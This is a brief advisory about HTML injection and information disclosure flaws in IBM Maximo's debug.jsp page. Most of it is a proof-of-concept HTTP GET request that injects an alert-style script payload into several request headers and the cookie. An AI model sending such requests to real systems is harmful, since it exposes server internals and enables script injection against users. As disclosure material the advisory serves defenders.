|
IBM Maximo 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities
Attackers can exploit these issues by using a browser or standard tools. The following proof-of-concept HTTP GET request is available for the information-disclosure issue: GET /jsp/common/system/debug.jsp HTTP/1.1 Accept: <script>alert('XSS');</script> Accept-Language: <script>alert('XSS');</script> UA-CPU: <script>alert('XSS');</script> Accept-Encoding: <script>alert('XSS');</script> User-Agent: <script>alert('XSS');</script> Host: maximo Connection: Keep-Alive Cookie: <script>alert('XSS');</script> |
|
|
Privacy Statement |